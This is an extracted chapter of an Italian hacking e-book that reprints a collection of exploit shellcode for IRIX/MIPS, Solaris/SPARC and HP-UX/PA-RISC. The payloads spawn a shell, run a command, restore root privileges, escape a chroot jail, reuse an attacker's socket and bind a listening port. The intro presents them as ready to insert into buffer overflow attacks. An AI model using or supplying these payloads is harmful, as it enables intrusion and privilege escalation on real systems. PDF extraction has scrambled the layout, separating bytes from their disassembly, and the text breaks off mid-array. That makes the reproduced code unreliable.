Sei sulla pagina 1di 46

Hackers Programming Book

Codici assembler per usi legati ai buffers


Fino ad ora abbiamo parlato delle tecniche che avrebbero dovuto permettere di inserire
dentro a dei buffers i codici da fare eseguire tramite la soprascrittura degli indirizzi di ritorno.
In altre parole allinterno dei vari buffer overflow necessario inserire dei codici assembler
per cui il problema spesso quello di non essere in grado di scrivere le varie parti di codice
che chiaramente devono essere specifiche per il processore attaccato.
Mediante la varie routine di analisi necessario cercare di capire anche larchitettura
interessata in quanto chiaramente un codice scritto in asembler per un sistema LINUX su
architettura X86 non funzioner su un processore MIPS.
Qui a seguito vi riporto i codici assembler per vari scopi e varie architetture.
In generale gli scopi sono questi :
Shell Execution:

execl(/bin/sh, /bin/sh, 0);

Shell Single Command Execution:

execl(/bin/sh, /bin/sh, -c,

Privilege Restoration:

setuid(0);
seteuid(0);
setreuid(getuid(), 0);
setreuid(0,0);
setresuid(0,0,0);

Chroot Limited Enviroment Escape:

mkdir(a..., mode);
chroot(a..);
for(I=257;I--;I>0) chdir(..);
chroot(.);

Find Socket Code (findsckcode):

j=sizeof(sockaddr_in);
for(i=256;i>=0;i--){
if(getpeername(sck,&adr,&j)==-1)
continue;
if(*((unsigned
short)&(adr[2]))==htons(port))
break;
}
for(j=2;j>=0;j--) dup2(j,i);

Network server code (bindsckcode):

sck=socket(AF_INET,SOCK_STREAM,0);
bind(sck,addr,sizeof(addr));
listen(sck,5);
clt=accept(sck,NULL,0);
for(i=2;i>=0;i--) dup2(i,clt);

Stack pointer retrieval (jump):

int sp=(*(int(*)())jump)();

cmd,

0);

Ad ogni modo la cdifica asembler la potete trovare nelle pagine che seguono e sono riassunti
nella seguente tabella.
processor
---------mips
sparc
parisc
powerpc
alpha
x86
x86
x86
x86
x86
x86
x86
x86

system
----------irix
solaris
hp-ux
aix
ultrix
solaris
beos
linux
openbsd
freebsd
netbsd
openserver
unixware

version
---------------------------------------5.3 6.2 6.3 6.4 6.5 6.5.10
2.6 2.7 2.8
10.20
4.1 4.2 4.3
5.0
2.6 2.7 2.8
5.0
6.2 (redhat)
2.8
3.4
1.5
5.0.4
7.0

p S C P R F B
------------- x x x x x x
- x x x x x x
- x x x x x x
x x x x x x x
- x x x - - x x x x x x x
- x x - - - - x x x x x x
- x x x x x x
- x x x x x x
- x x x x x x
x x x x x - x x x x x x -

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

Dove le lettere specificano :


p
S
C
P
R
F
B

prefix
interactive shell
single command
restore privileges
escape chroot jail
find socket
bind socket

IRIX/MIPS codes, file: mips-irix


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for irix 5.3 6.2 6.3 6.4 6.5 6.5.10 mips
/*
syscall
----------execv
execv
getuid
setreuid
mkdir
chroot
chdir
getpeername
socket
bind
listen
accept
close
dup
*/

%v0
---x3f3
x3f3
x400
x464
x438
x425
x3f4
x445
x453
x442
x448
x441
x3ee
x411

*://lsd-pl.net/ #*/
#*/

%a0,%a1,%a2,%a3
--------------------------------------------------------------->path="/bin/sh",->[->a0=path,0]
->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
ruid,euid=0
->path="a..",mode= (each value is valid)
->path={"a..","."}
->path=".."
sfd,->sadr=[],->[len=605028752]
AF_INET=2,SOCK_STREAM=2,prot=0
sfd,->sadr=[0x30,2,hi,lo,0,0,0,0],len=0x10
sfd,backlog=5
sfd,0,0
fd={0,1,2}
sfd

#if defined(MIPS) && defined(IRIX)


char shellcode[]=
"\x04\x10\xff\xff"
"\x24\x02\x03\xf3"
"\x23\xff\x01\x14"
"\x23\xe4\xff\x08"
"\x23\xe5\xff\x10"
"\xaf\xe4\xff\x10"
"\xaf\xe0\xff\x14"
"\xa3\xe0\xff\x0f"
"\x03\xff\xff\xcc"
"/bin/sh"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

9*4+7 bytes
bltzal $zero,<shellcode>
li
$v0,1011
addi
$ra,$ra,276
addi
$a0,$ra,-248
addi
$a1,$ra,-220
sw
$a0,-220($ra)
sw
$zero,-236($ra)
sb
$zero,-241($ra)
syscall

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\x04\x10\xff\xff"
"\x24\x02\x03\xf3"
"\x23\xff\x08\xf0"
"\x23\xe4\xf7\x40"
"\x23\xe5\xfb\x24"
"\xaf\xe4\xfb\x24"
"\x23\xe6\xf7\x48"
"\xaf\xe6\xfb\x28"
"\x23\xe6\xf7\x4c"
"\xaf\xe6\xfb\x2c"
"\xaf\xe0\xfb\x30"
"\xa3\xe0\xf7\x47"
"\xa3\xe0\xf7\x4a"
"\x03\xff\xff\xcc"
"/bin/sh -c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

14*4+12+cmdlen bytes
bltzal $zero,<cmdshellcode>
li
$v0,1011
addi
$ra,$ra,2288
addi
$a0,$ra,-2240
addi
$a1,$ra,-1244
sw
$a0,-1244($ra)
addi
$a2,$ra,-2232
sw
$a2,-1240($ra)
addi
$a2,$ra,-2228
sw
$a2,-1236($ra)
sw
$zero,-1232($ra)
sb
$zero,-2233($ra)
sb
$zero,-2230($ra)
syscall

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setreuidcode[]=
"\x24\x02\x04\x01"
"\x20\x42\xff\xff"
"\x03\xff\xff\xcc"
"\x30\x44\xff\xff"

/*
/*
/*
/*
/*

7*4 bytes
li
$v0,1024+1
addi
$v0,$v0,-1
syscall
andi
$a0,$v0,0xffff

*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


/* andi
$a1,$zero,0xffff
/* li
$v0,1124
/* syscall

*/
*/
*/

char chrootcode[]=
"\x30\x61.."
"\x04\x10\xff\xff"
"\xaf\xe0\xff\xf8"
"\x23\xe4\xff\xf5"
"\x24\x02\x04\x38"
"\x03\xff\xff\xcc"
"\x23\xe4\xff\xf5"
"\x24\x02\x04\x25"
"\x03\xff\xff\xcc"
"\x24\x11\x01\x01"
"\x23\xe4\xff\xf6"
"\x24\x02\x03\xf4"
"\x03\xff\xff\xcc"
"\x22\x31\xff\xff"
"\x06\x21\xff\xfb"
"\x23\xe4\xff\xf7"
"\x24\x02\x04\x25"
"\x03\xff\xff\xcc"
;

/* 18*4 bytes

*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

bltzal
sw
addi
li
syscall
addi
li
syscall
li
addi
li
syscall
addi
bgez
addi
li
syscall

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x04\x10\xff\xff"
"\x24\x10\x01\x90"
"\x22\x11\x01\x9c"
"\x22\x0d\xfe\x94"
"\x03\xed\x68\x20"
"\x01\xa0\xf0\x09"
"\x97\xeb\xff\xc2"
"\x24\x0c\x12\x34"
"\x01\x6c\x58\x23"
"\x22\x0d\xfe\xbc"
"\x11\x60\xff\xf9"
"\x22\x24\xfe\xd4"
"\x23\xe5\xff\xc0"
"\x23\xe6\xff\xfc"
"\x24\x02\x04\x45"
"\x03\xff\xff\xcc"
"\x22\x31\xff\xff"
"\x10\xe0\xff\xf4"
"\x22\x2b\xfe\xd4"
"\x1d\x60\xff\xf7"
"\x22\x04\xfe\x72"
"\x24\x02\x03\xee"
"\x03\xff\xff\xcc"
"\x22\x24\xfe\xd5"
"\x24\x02\x04\x11"
"\x03\xff\xff\xcc"
"\x22\x10\xff\xff"
"\x22\x0b\xfe\x72"
"\x05\x61\xff\xf7"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

29*4 bytes
bltzal $zero,<findsckcode>
li
$s0,400
addi
$s1,$s0,412
addi
$t5,$s0,-(400-36)
add
$t5,$ra,$t5
jalr
$s8,$t5
lhu
$t3,-62($ra)
li
$t4,0x1234
subu
$t3,$t3,$t4
addi
$t5,$s0,-(400-76)
beqz
$t3,<findsckcode+16>
addi
$a0,$s1,-300
addi
$a1,$ra,-64
addi
$a2,$ra,-4
li
$v0,1093
syscall
addi
$s1,$s1,-1
beqz
$a3,<findsckcode+24>
addi
$t3,$s1,-300
bgzt
$t3,<findsckcode+44>
addi
$a0,$s0,-398
li
$v0,1006
syscall
addi
$a0,$s1,-299
li
$v0,1041
syscall
addi
$s0,$s0,-1
addi
$t3,$s0,-398
bgez
$t3,<findsckcode+80>

char bindsckcode[]=
"\x30\x02\x12\x34"
"\x04\x10\xff\xff"
"\x24\x11\x01\xff"
"\xaf\xe0\xff\xf8"
"\x22\x24\xfe\x03"
"\x22\x25\xfe\x03"
"\x22\x26\xfe\x01"
"\x24\x02\x04\x53"
"\x03\xff\xff\xcc"
"\x30\x44\xff\xff"
"\x23\xe5\xff\xf4"
"\x22\x26\xfe\x11"
"\x24\x02\x04\x42"
"\x03\xff\xff\xcc"
"\x22\x25\xfe\x06"
"\x24\x02\x04\x48"
"\x03\xff\xff\xcc"
"\x22\x25\xfe\x01"

/* 31*4 bytes

*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

"\x30\x05\xff\xff"
"\x24\x02\x04\x64"
"\x03\xff\xff\xcc"

bltzal
li
sw
addi
addi
addi
li
syscall
andi
addi
addi
li
syscall
addi
li
syscall
addi

$zero,<chrootcode+4>
$zero,-8($ra)
$a0,$ra,-11
$v0,1080
$a0,$ra,-11
$v0,1061
$s1,257
$a0,$ra,-10
$v0,1012
$s1,$s1,-1
$s1,<chrootcode+40>
$a0,$ra,-9
$v0,1061

$zero,<bindsckcode+4>
$s1,511
$zero,-8($ra)
$a0,$s1,-509
$a1,$s1,-509
$a2,$s1,-511
$v0,1107
$a0,$v0,0xffff
$a1,$ra,-12
$a2,$s1,-(511-16)
$v0,1090
$a1,$s1,-506
$v0,1096
$a1,$s1,-511

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

"\x22\x26\xfe\x01"
"\x24\x02\x04\x41"
"\x03\xff\xff\xcc"
"\x02\x22\x98\x20"
"\x22\x32\xfe\x03"
"\x02\x40\x20\x25"
"\x24\x02\x03\xee"
"\x03\xff\xff\xcc"
"\x22\x64\xfe\x01"
"\x24\x02\x04\x11"
"\x03\xff\xff\xcc"
"\x22\x52\xff\xff"
"\x06\x41\xff\xf8"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

addi
li
syscall
add
addi
move
li
syscall
addi
li
syscall
addi
bgez

char jump[]=
"\x03\xa0\x10\x25"
"\x03\xe0\x00\x08"
;

/* move
/* jr

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

30
2

$a2,$s1,-511
$v0,1089

$s2,$s2,-1
$s2,<bindsckcode+92>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

$v0,$sp
$ra

*/
*/

$s3,$s1,$v0
$s2,$s1,-509
$a0,$s2
$v0,1006
$a0,$s3,-511
$v0,1041

#endif

Solaris/SPARC codes, file: sparc-solaris


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for solaris 2.6 2.7 2.8 sparc
/*
syscall
----------exec
exec
setuid
mkdir
chroot
chdir
ioctl
so_socket
bind
listen
accept
fcntl
*/

%g1
---x00b
x00b
x017
x050
x03d
x00c
x036
x0e6
x0e8
x0e9
x0ea
x03e

*://lsd-pl.net/ #*/
#*/

%o0,%o1,%o2,%o3,%o4
--------------------------------------------------------------->path="/bin/ksh",->[->a0=path,0]
->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
uid=0
->path="b..",mode= (each value is valid)
->path={"b..","."}
->path=".."
sfd,TI_GETPEERNAME=0x5491,->[mlen=0x54,len=0x54,->sadr=[]]
AF_INET=2,SOCK_STREAM=2,prot=0,devpath=0,SOV_DEFAULT=1
sfd,->sadr=[0x33,2,hi,lo,0,0,0,0],len=0x10,SOV_SOCKSTREAM=2
sfd,backlog=5,vers= (not required in this syscall)
sfd,0,0,vers= (not required in this syscall)
sfd,F_DUP2FD=0x09,fd={0,1,2}

#if defined(SPARC) && defined(SOLARIS)


#ifdef ABOVE_SPARCV8PLUS
char shellcode[]=
"\x9f\x41\x40\x01"
"\x90\x03\xe0\x20"
"\x92\x02\x20\x10"
"\xc0\x22\x20\x08"
"\xd0\x22\x20\x10"
"\xc0\x22\x20\x14"
"\x82\x10\x20\x0b"
"\x91\xd0\x20\x08"
"/bin/ksh"
;
#endif
char shellcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x90\x03\xe0\x20"
"\x92\x02\x20\x10"
"\xc0\x22\x20\x08"
"\xd0\x22\x20\x10"
"\xc0\x22\x20\x14"
"\x82\x10\x20\x0b"
"\x91\xd0\x20\x08"

/*
/*
/*
/*
/*
/*
/*
/*
/*

8*4+8 bytes
*/
rd
%pc,%o7 ! >= sparcv8+ */
add
%o7,32,%o0
*/
add
%o0,16,%o1
*/
st
%g0,[%o0+8]
*/
st
%o0,[%o0+16]
*/
st
%g0,[%o0+20]
*/
mov
0x0b,%g1
*/
ta
8
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

10*4+8 bytes
bn,a
<shellcode-4>
bn,a
<shellcode>
call
<shellcode+4>
add
%o7,32,%o0
add
%o0,16,%o1
st
%g0,[%o0+8]
st
%o0,[%o0+16]
st
%g0,[%o0+20]
mov
0x0b,%g1
ta
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

"/bin/ksh"

char cmdshellcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x90\x03\xe0\x34"
"\x92\x23\xe0\x20"
"\xa2\x02\x20\x0c"
"\xa4\x02\x20\x10"
"\xc0\x2a\x20\x08"
"\xc0\x2a\x20\x0e"
"\xd0\x23\xff\xe0"
"\xe2\x23\xff\xe4"
"\xe4\x23\xff\xe8"
"\xc0\x23\xff\xec"
"\x82\x10\x20\x0b"
"\x91\xd0\x20\x08"
"/bin/ksh
-c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

15*4+16+cmdlen bytes
bn,a
<cmdshellcode-4>
bn,a
<cmdshellcode>
call
<cmdshellcode+4>
add
%o7,52,%o0
sub
%o7,32,%o1
add
%o0,12,%l1
add
%o0,16,%l2
stb
%g0,[%o0+8]
stb
%g0,[%o0+14]
st
%o0,[%o7-32]
st
%l1,[%o7-28]
st
%l2,[%o7-24]
st
%g0,[%o7-20]
mov
0x0b,%g1
ta
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setuidcode[]=
"\x90\x08\x20\x01"
"\x82\x10\x20\x17"
"\x91\xd0\x20\x08"
;

/*
/*
/*
/*

3*4 bytes
and
%g0,1,%o0
mov
0x17,%g1
ta
8

*/
*/
*/
*/

char chrootcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x80\x61.."
"\xc0\x2b\xe0\x08"
"\x90\x03\xe0\x05"
"\x82\x10\x20\x50"
"\x91\xd0\x20\x08"
"\x90\x03\xe0\x05"
"\x82\x10\x20\x3d"
"\x91\xd0\x20\x08"
"\xaa\x20\x3f\xe0"
"\x90\x03\xe0\x06"
"\x82\x10\x20\x0c"
"\xaa\x85\x7f\xff"
"\x12\xbf\xff\xfd"
"\x91\xd0\x20\x08"
"\x90\x03\xe0\x07"
"\x82\x10\x20\x3d"
"\x91\xd0\x20\x08"
;

/*
/*
/*
/*

20*4 bytes
bn,a
<chrootcode-4>
bn,a
<chrootcode>
call
<chrootcode+4>

*/
*/
*/
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

stb
add
mov
ta
add
mov
ta
sub
add
mov
addcc
ble
ta
add
mov
ta

%g0,[%o7+8]
%o7,5,%o0
0x50,%g1
8
%o7,5,%o0
0x3d,%g1
8
%g0,-32,%l5
%o7,6,%o0
0x0c,%g1
%l5,-1,%l5
<chrootcode+48>
8
%o7,7,%o0
0x3d,%g1
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x33\x02\x12\x34"
"\xa0\x10\x20\xff"
"\xa2\x10\x20\x54"
"\xa4\x03\xff\xd0"
"\xaa\x03\xe0\x28"
"\x81\xc5\x60\x08"
"\xc0\x2b\xe0\x04"
"\xe6\x03\xff\xd0"
"\xe8\x03\xe0\x04"
"\xa8\xa4\xc0\x14"
"\x02\xbf\xff\xfb"
"\xaa\x03\xe0\x5c"
"\xe2\x23\xff\xc4"
"\xe2\x23\xff\xc8"
"\xe4\x23\xff\xcc"
"\x90\x04\x20\x01"
"\xa7\x2c\x60\x08"
"\x92\x14\xe0\x91"
"\x94\x03\xff\xc4"
"\x82\x10\x20\x36"
"\x91\xd0\x20\x08"

/*
/*
/*
/*

35*4 bytes
bn,a
<findsckcode-4>
bn,a
<findsckcode>
call
<findsckcode+4>

*/
*/
*/
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

mov
mov
add
add
jmp
stb
ld
ld
subcc
bz
add
st
st
st
add
sll
or
add
mov
ta

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

0xff,%l0
0x54,%l1
%o7,-48,%l2
%o7,40,%l5
%l5+8
%g0,[%o7+4]
[%o7-48],%l3
[%o7+4],%l4
%l3,%l4,%l4
<findsckcode+32>
%o7,92,%l5
%l1,[%o7-60]
%l1,[%o7-56]
%l2,[%o7-52]
%l0,1,%o0
%l1,8,%l3
%l3,0x91,%o1
%o7,-60,%o2
0x36,%g1
8

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\x1a\xbf\xff\xf1"
"\xa0\xa4\x20\x01"
"\x12\xbf\xff\xf5"
"\xa6\x10\x20\x03"
"\x90\x04\x20\x02"
"\x92\x10\x20\x09"
"\x94\x04\xff\xff"
"\x82\x10\x20\x3e"
"\xa6\x84\xff\xff"
"\x12\xbf\xff\xfb"
"\x91\xd0\x20\x08"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

bcc
deccc
bne
mov
add
mov
add
mov
addcc
bne
ta

char bindsckcode[]=
"\x20\xbf\xff\xff"
"\x20\xbf\xff\xff"
"\x7f\xff\xff\xff"
"\x33\x02\x12\x34"
"\x90\x10\x20\x02"
"\x92\x10\x20\x02"
"\x94\x08\x20\x01"
"\x96\x08\x20\x01"
"\x98\x10\x20\x01"
"\x82\x10\x20\xe6"
"\x91\xd0\x20\x08"
"\xa2\x22\x3f\xff"
"\xc0\x23\xe0\x08"
"\x92\x03\xe0\x04"
"\x94\x10\x20\x10"
"\x96\x10\x20\x02"
"\x82\x10\x20\xe8"
"\x91\xd0\x20\x08"
"\x90\x04\x7f\xff"
"\x92\x10\x20\x05"
"\x82\x10\x20\xe9"
"\x91\xd0\x20\x08"
"\x90\x04\x7f\xff"
"\x92\x08\x20\x01"
"\x94\x08\x20\x01"
"\x82\x10\x20\xea"
"\x91\xd0\x20\x08"
"\xa6\x10\x20\x03"
"\x92\x10\x20\x09"
"\x94\x04\xff\xff"
"\x82\x10\x20\x3e"
"\xa6\x84\xff\xff"
"\x12\xbf\xff\xfc"
"\x91\xd0\x20\x08"
;

/*
/*
/*
/*

34*4 bytes
bn,a
<bindsckcode-4>
bn,a
<bindsckcode>
call
<bindsckcode+4>

*/
*/
*/
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

mov
mov
and
and
mov
mov
ta
sub
st
add
mov
mov
mov
ta
add
mov
mov
ta
add
and
and
mov
ta
mov
mov
add
mov
addcc
bne
ta

0x02,%o0
0x02,%o1
%g0,1,%o2
%g0,1,%o3
0x01,%o4
0xe6,%g1
8
%o0,-1,%l1
%g0,[%o7+8]
%o7,4,%o1
0x10,%o2
0x02,%o3
0xe8,%g1
8
%l1,-1,%o0
0x05,%o1
0xe9,%g1
8
%l1,-1,%o0
%g0,1,%o1
%g0,1,%o2
0xea,%g1
8
0x03,%l3
0x09,%o1
%l3,-1,%o2
0x3e,%g1
%l3,-1,%l3
<bindsckcode+112>
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

%o7+8
%sp,%o0

*/
*/

char jump[]=
"\x81\xc3\xe0\x08"
"\x90\x10\x00\x0e"
;

/* jmp
/* mov

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

14
14

<findsckcode+36>
%l0
<findsckcode+60>
0x03,%l3
%l0,2,%o0
0x09,%o1
%l3,-1,%o2
0x3e,%g1
%l3,-1,%l3
<findsckcode+112>
8

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

#endif

HP-UX/PA-RISC codes, file: parisc-hpux


/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## asmcodes for hp-ux 10.20 parisc
/*
syscall
----------execv
execv
setresuid
mkdir
chroot
chdir
getpeername
socket

%r22
---x00b
x00b
x07e
x088
x03d
x00c
x116
x122

*://lsd-pl.net/ #*/
#*/

%r26,%r25,%r24,%r23
--------------------------------------------------------------->path="/bin/sh",0
->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
0,0,0
->path="a..",mode= (each value is valid)
->path={"a..","."}
->path=".."
sfd,->sadr=[],->[0x10]
AF_INET=2,SOCK_STREAM=1,prot=0

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


bind
listen
accept
dup2
*/

x114
x119
x113
x05a

sfd,->sadr=[0x61,2,hi,lo,0,0,0,0],len=0x10
sfd,backlog=5
sfd,0,0
sfd,fd={0,1,2}

#if defined(PARISC) && defined(HPUX)


char shellcode[]=
"\xeb\x5f\x1f\xfd"
"\x0b\x39\x02\x99"
"\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\xb4\x16\x70\x16"
"/bin/sh"
;

/*
/*
/*
/*
/*
/*
/*
/*

7*4+8 bytes
bl
<shellcode+4>,%r26
xor
%r25,%r25,%r25
addi,< 0x11,%r26,%r26
stbs
%r0,7(%r26)
ldil
L%0xc0000004,%r1
ble
R%0xc0000004(%sr7,%r1)
addi,> 0xb,%r0,%r22

*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x5f\x1f\xfd"
"\x20\x20\x08\x01"
"\xb7\x5a\x40\x5a"
"\xb7\x56\x40\x10"
"\xb7\x55\x40\x18"
"\x0f\x40\x12\x0e"
"\x0f\x40\x12\x14"
"\x6b\x5a\x3f\x99"
"\x6b\x56\x3f\xa1"
"\x6b\x55\x3f\xa9"
"\x6b\x40\x3f\xb1"
"\xb7\x59\x47\x99"
"\xe4\x20\xe0\x08"
"\xb4\x16\x70\x16"
"/bin/sh -c "
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

14*4+12+cmdlen bytes
bl
<cmdshellcode+4>,%r26
ldil
L%0xc0000004,%r1
addi,< 0x2d,%r26,%r26
addi,< 0x8,%r26,%r22
addi,< 0xc,%r26,%r21
stbs
%r0,0x7(%r26)
stbs
%r0,0xa(%r26)
stw
%r26,-0x34(%r26)
stw
%r22,-0x30(%r26)
stw
%r21,-0x2c(%r26)
stw
%r0, -0x28(%r26)
addi,< -0x34,%r26,%r25
ble
R%0xc0000004(%sr7,%r1)
addi,> 0x0b,%r0,%r22

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setresuidcode[]=
"\x0b\x5a\x02\x9a"
"\x0b\x39\x02\x99"
"\x0b\x18\x02\x98"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\xb4\x16\x70\xfc"
;

/*
/*
/*
/*
/*
/*
/*

6*4 bytes
xor
%r26,%r26,%r26
xor
%r25,%r25,%r25
xor
%r24,%r24,%r24
ldil
L%0xc0000004,%r1
ble
R%0xc0000004(%sr7,%r1)
addi,> 0x7e,%r0,%r22

*/
*/
*/
*/
*/
*/
*/

char chrootcode[]=
"\xb4\x17\x40\x04"
"\xeb\x57\x40\x02"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\x0a\xf7\x02\x97"
"\xe8\x40\xc0\x02"
"\x61\x2e\x2e\x2e"
"\xb7\x5a\x40\x12"
"\x08\x1a\x06\x0c"
"\x0d\x80\x12\x06"
"\xe8\x5f\x1f\xad"
"\xb4\x16\x71\x10"
"\x08\x0c\x06\x1a"
"\xe8\x5f\x1f\x95"
"\xb4\x16\x70\x7a"
"\xb4\x0d\x01\xfe"
"\xb5\x9a\x40\x02"
"\xe8\x5f\x1f\x75"
"\xb4\x16\x70\x18"
"\x88\x0d\x3f\xdd"
"\xb5\xad\x07\xff"
"\xb5\x9a\x40\x04"
"\xe8\x5f\x1f\x4d"
"\xb4\x16\x70\x7a"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

24*4 bytes
*/
addi,< 0x2,%r0,%r23
*/
blr,n
%r23,%r26
*/
ldil
L%0xc0000004,%r1
*/
ble
R%0xc0000004(%sr7,%r1) */
xor
%r23,%r23,%r23
*/
bv,n
0(%rp)
*/
a...
*/
addi,< 0x9,%r26,%r26
*/
add
%r26,%r0,%r12
*/
stbs
%r0,0x3(%r12)
*/
bl
<chrootcode+4>,%rp
*/
addi,> 0x88,%r0,%r22
*/
add
%r12,%r0,%r26
*/
bl
<chrootcode+4>,%rp
*/
addi,> 0x3d,%r0,%r22
*/
addi
0xff,%r0,%r13
*/
addi,< 0x1,%r12,%r26
*/
bl
<chrootcode+4>,%rp
*/
addi,> 0xc,%r0,%r22
*/
combf,= %r13,%r0,<chrootcode+64> */
addi
-0x1,%r13,%r13
*/
addi,< 0x2,%r12,%r26
*/
bl
<chrootcode+4>,%rp
*/
addi,> 0x3d,%r0,%r22
*/

char findsckcode[]=
"\xe9\x9f\x1f\xfd"
"\x0b\x18\x02\x98"

/* 30*4 bytes
/* bl
<findsckcode+4>,%r12
/* xor
%r24,%r24,%r24

*/
*/
*/

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"\xb4\x0e\x01\xde"
"\xb5\x98\x07\xd3"
"\xb5\x99\x07\xdb"
"\x08\x0e\x06\x1a"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\xb4\x16\x02\x2c"
"\x80\x1c\x20\x20"
"\x0b\x18\x02\x98"
"\xb5\xce\x07\xff"
"\x88\x0e\x3f\xad"
"\x0b\x18\x02\x98"
"\x61\x61\x12\x34"
"\xb5\x99\x06\x3f"
"\x47\x2f\x02\x20"
"\x45\x90\x3f\xdf"
"\x82\x0f\x20\x10"
"\x0b\x18\x02\x98"
"\x8a\x0f\x3f\x6d"
"\xb5\xce\x07\xff"
"\xb4\x0f\x40\x04"
"\x08\x0e\x06\x1a"
"\x08\x0f\x06\x19"
"\x20\x20\x08\x01"
"\xe4\x20\xe0\x08"
"\xb4\x16\x70\xb4"
"\x88\x0f\x3f\xcd"
"\xb5\xef\x07\xff"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

addi
addi
addi
add
ldil
ble
addi
comb,=
xor
addi
combf,=
xor

0xef,%r0,%r14
*/
-0x17,%r12,%r24
*/
-0x13,%r12,%r25
*/
%r14,%r0,%r26
*/
L%0xc0000004,%r1
*/
R%0xc0000004(%sr7,%r1) */
0x116,%r0,%r22
*/
%ret0,%r0,<findsckcode+60> */
%r24,%r24,%r24
*/
-0x1,%r14,%r14
*/
%r14,%r0,<findsckcode+12> */
%r24,%r24,%r24
*/

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

addi
ldh
ldh
comb,=
xor
combf,=
addi
addi,<
add
add
ldil
ble
addi,>
combf,=
addi

-0xe1,%r12,%r25
*/
0x110(%r25),%r15
*/
-0x11(%r12),%r16
*/
%r15,%r16,<findsckcode+88> */
%r24,%r24,%r24
*/
%r15,%r16,<findsckcode+12> */
-0x1,%r14,%r14
*/
0x2,%r0,%r15
*/
%r14,%r0,%r26
*/
%r15,%r0,%r25
*/
L%0xc0000004,%r1
*/
R%0xc0000004(%sr7,%r1) */
0x5a,%r0,%r22
*/
%r15,%r0,<findsckcode+92> */
-0x1,%r15,%r15
*/

char bindsckcode[]=
"\xb4\x17\x40\x04"
"\xe9\x97\x40\x02"
"\x20\x20\x08\x01"
